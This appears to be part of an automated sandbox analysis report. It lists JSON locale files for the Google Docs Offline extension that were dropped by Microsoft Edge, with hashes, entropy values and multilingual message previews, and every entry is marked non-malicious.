                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1028
                                                                                                                                                                                                                                                      Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                      MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                      SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                      SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                      SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):994
                                                                                                                                                                                                                                                      Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                      MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                      SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                      SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                      SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2091
                                                                                                                                                                                                                                                      Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                      MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                      SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                      SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                      SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2778
                                                                                                                                                                                                                                                      Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                      MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                      SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                      SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                      SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1719
                                                                                                                                                                                                                                                      Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                      MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                      SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                      SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                      SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):936
                                                                                                                                                                                                                                                      Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                      MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                      SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                      SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                      SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3830
                                                                                                                                                                                                                                                      Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                      MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                      SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                      SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                      SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1898
                                                                                                                                                                                                                                                      Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                      MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                      SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                      SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                      SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):914
                                                                                                                                                                                                                                                      Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                      MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                      SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                      SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                      SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):878
                                                                                                                                                                                                                                                      Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                      MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                      SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                      SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                      SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2766
                                                                                                                                                                                                                                                      Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                      MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                      SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                      SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                      SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):978
                                                                                                                                                                                                                                                      Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                      MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                      SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                      SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                      SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):907
                                                                                                                                                                                                                                                      Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                      MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                      SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                      SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                      SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):914
                                                                                                                                                                                                                                                      Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                      MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                      SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                      SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                      SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                      Malicious:false
